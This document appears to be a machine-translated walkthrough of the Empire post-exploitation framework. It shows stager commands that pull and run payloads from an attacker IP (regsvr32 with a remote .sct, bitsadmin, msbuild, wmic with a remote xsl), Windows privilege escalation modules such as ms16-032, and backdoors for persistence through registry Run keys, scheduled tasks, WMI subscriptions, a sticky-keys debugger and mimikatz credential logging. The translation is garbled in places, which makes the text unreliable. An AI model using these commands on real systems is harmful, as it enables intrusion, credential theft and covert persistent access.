Empire (usestager usage, authorization, persistence backdoor)
Premise of this chapter: the listener has been set up successfully (please refer to Article 14 of day for how to set up the listener)
1. Several usages of usestager
windows/launcher_sct:
Introduction: Regsvr32 command is used to register COM components. It is a command provided by Windows system to register or unload controls to the system. It runs in command line mode. Regsvr32.exe for WinXP and above systems is under Windows / system32 folder; regsvr32.exe for 2000 system is under WinNT / system32 folder.
Usage:regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
1) usestager windows/launcher_ SCT enters windows / launcher_ SCT module
2) Set the parameters
set Listener kali set OutFile /var/www/html/xx.sct |
3) Execute
4) Run Regsvr32 / U / N / S / I on the target aircraft http://192.168.227.129/xx.sct scrobj.dll
5) Successfully returned to session
windows/launcher_vbs:
Remote download:bitsadmin /transfer /n http://IP/xx.vbs path
1) usestager windows/launcher_ VBS enters windows / launcher_ VBS module
2) Set the parameters
3) Execute
4) Running on target
bitsadmin /transfer n http://192.168.227.129/xx.vbs C:\Users\xxx\Desktop\xx.vbs
5) The target machine executed the. VBS file and successfully rebounded the session
windows/launcher_xml:
Msbuild is a free open source build tool set for managing native C + + code. Before visual studio 2013, msbuild was part of the. Net framework, but after that, msbuild was bound to visual studio. Therefore, visual studio relies on msbuild, but msbuild does not rely on visual studio.
Usage:Using msbuild in net4.0 to run shellcode injected XML file to rebound shell。
1) As in the previous two operations, generate the XML file to the / var / www / HTML / folder
2) Download the file on the target
3) CD to C: windows on target\ Microsoft.NET \Framework64.0.30319 running XML using msbuild
4) Successfully rebounded session
windows/wmic:
Wmic extends WMI (Windows Management Instrumentation) to support system management from command line interface and batch command script.
Usage:wmic os get /format:”http://IP/xx.xsl”
1) As in the previous two steps, save the generated XSL to the HTML folder
2) Execute wmic OS get / format on the target“ http://192.168.227.129/xx.xsl “
3) Successfully rebounded session
2. Empire authorization module
UAC and bypass UAC are introduced in day14
Local delegation
Ms16-135: win32k information disclosure vulnerability
To exploit this vulnerability, an attacker must log on to the affected system and run a specially designed application. This security update fixes this vulnerability by correcting the way the windows kernel processes memory addresses.
Search module ms16-135 find ms16-135 module
Usemodule privec / ms16-135
Execute after setting parameters
Successfully rebounded session with privilege
Ms16-032: secondary login privilege escalation vulnerability
If the windows secondary login service fails to properly manage the request handle in memory, a privilege escalation vulnerability exists in Microsoft Windows. An attacker who successfully exploits this vulnerability can run arbitrary code as an administrator.
Usemodule privec / ms16-032
After setting the parameters, execute
Successfully returned a session with system privileges
PowerShell / privec / Sherlock to find windows local privilege upgrade vulnerability
Usemodule privec / Sherlock uses this module
Show vulnerability of local privilege escalation
Using powerup to raise rights
Powerup is a PowerShell tool that helps upgrade local privileges on Windows systems. It contains a variety of methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings and upgrade opportunities. It is part of powertools and is located in https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp 。 Empire implements the upgrade function of powerup in the privec / powerup / * module.
Usemodule privec / powerup / allchecks to detect whether powerup vulnerabilities can be exploited
Show vulnerability
Use the corresponding module according to the vulnerability
You can see that there are improperly configured permissions on the service executable (via the service_ exe_ *Use it)
But I’ve tried it all over here. It’s not very easy to use
3. The back door of persistence
PowerBreach
Introduction: powerbreak is a series of in memory PowerShell backdoors, which can provide triggers for various options.
persistence/powerbreach/deaduser– accepts the user name and the switch / flag on whether the user name is a domain name (relative to the local account). Every sleep seconds, the script checks whether the account still exists, and if not, triggers the staging logic. The backdoor does not require local administrator privileges.
Understanding: judge whether the user name you set exists (whether it has been renamed or deleted). When the name is changed, it will trigger the script to bounce shell
Use module persistence / powerbreak / deaduser
View the required parameters
Set related parameters
implement
Changed AAA to BBB
Shell successfully rebounded
persistence/powerbreach/eventlog-Event log – queries the security event log at intervals to find events with unique trigger values. Door doesAdministrator permission requiredTo access the security event log.
Usemodule persistence / powerbreak / eventlog * using modules
View the required parameters
Set related parameters
implement
Turn on the eventvwr of the target. When the “hacker” keyword (defined in the above parameters can be changed by yourself) exists in the security log
Successfully rebounded session
Because it is a backdoor left by administrator rights, the returned session also has administrator rights
persistence/powerbreach /resolver– the host name and trigger IP to be resolved. The script checks every sleep second whether the host name resolves to the trigger IP, otherwise the staging logic will be triggered. The backdoor does not require local administrator privileges.
Use module persistence / powerbreak / resolver
View the required parameters
Set related parameters
implement
Go to the target plane to visit 127.0.0.1 and ask him to analyze it
Shell successfully rebounded
Userland
persistence/userland/ *Module allows user mode, from restart persistence (i.e. no administrative permissions). If a listener is specified, the staging code for the Empire agent is automatically generated and used as the script logic for triggering.
Persistence / userland / registry – in HKCU:Software \Set a value in Microsoft / Windows / CurrentVersion / run to execute the script under any storage mechanism you choose. This will cause the script to run only if the user is logged in.
Use module persistence / userland / registry
View the required parameters
Set related parameters
implement
Log out of the target and log in again, and successfully return to the shell session (here, there will be a short power shell pop-up box when the user logs in)
persistence/userland/schtask– configure scheduled tasks to execute scripts with any storage mechanism selected. The script can be triggered in dailytime (HH: mm format) or after the user has idle idletime seconds
Understanding: This is the scheduled task in the registry
Use module persistence / userland / schtasks
View the required parameters
Set related parameters
implement
Log off the target and log in again. When the set time is up, return to the shell session successfully
Elevated
persistence/elevated/*Module allows restart persistence from elevated context (i.e. with administrative privileges). If a listener is specified, the staging code for the Empire agent is automatically generated and used as the script logic for triggering.
Understanding: This module is a backdoor with administrator rights
Persistence / upgraded / registry and persistence / upgraded / schtask are the same as the previous ones, except that administrator permissions are required
persistence/elevated/wmi– configure persistent WMI subscription to fire stored script logic. This script can be triggered when the system is started using either daily time (HH: mm format) or at startup. This has levels that are difficult to detect / remove.
Understanding: This is the scheduled task in the registry
Usemodule persistence / upgraded / WMI * using modules
View the required parameters
Set related parameters
implement
Verify the WMI on the target, and directly enter get wmiobject – namespace root / Subscription – class commandlineeventconsumer – Filter “name =’updater ‘” in the PowerShell
Restart the target and successfully rebound the shell with administrator permission
misc
persistence/misc/debugger*-In Empire 3.6.0, the persistence / debugger / * module is integrated into the persistence / misc / debugger * module. You can set image file execution options (also known as debugger) for various executable files that can be accessed before logging in at the RDP prompt. By default, the debugger is set to cmd.exe , which allows you to trigger a command prompt that runs as system through RDP without actually logging on to the computer. You can also use the binary parameter to specify the path to another binary. If you want the debugger to trigger the register, set the listener parameter. This generates a suitable register for the specified listener and stores it in the specified regpath. You can then trigger these staging procedures from the RDP prompt pre authentication, but note that once the RDP prompt is turned off (which occurs after 30 seconds of inactivity), the staging agent is killed.
Usemodule persistence / misc / debugger * using modules
View the required parameters
Setting parameters
implement
Press shift five times in the target win7 login interface, and a PowerShell box flashes by
Successfully returned to session with administrator rights
persistence/misc/memssp– install the memssp module of mimikatz, which should log off all authentication events to C: [windows / system32]\ mimisla.log 。 It should be rebooted for persistence.
Usemodule persistence / misc / memssp * using modules
Just run it directly
Target corresponding directory generated mimisla.log file
persistence/misc/disable_machine_acct_change– prevents the target from changing its computer account password. If you first run mimikatz / credentials / logonpasswords to dump the computer account password (the account ends in $), you should have persistent access to the given system. Cleanup options are also available.
After using this module, you can run it directly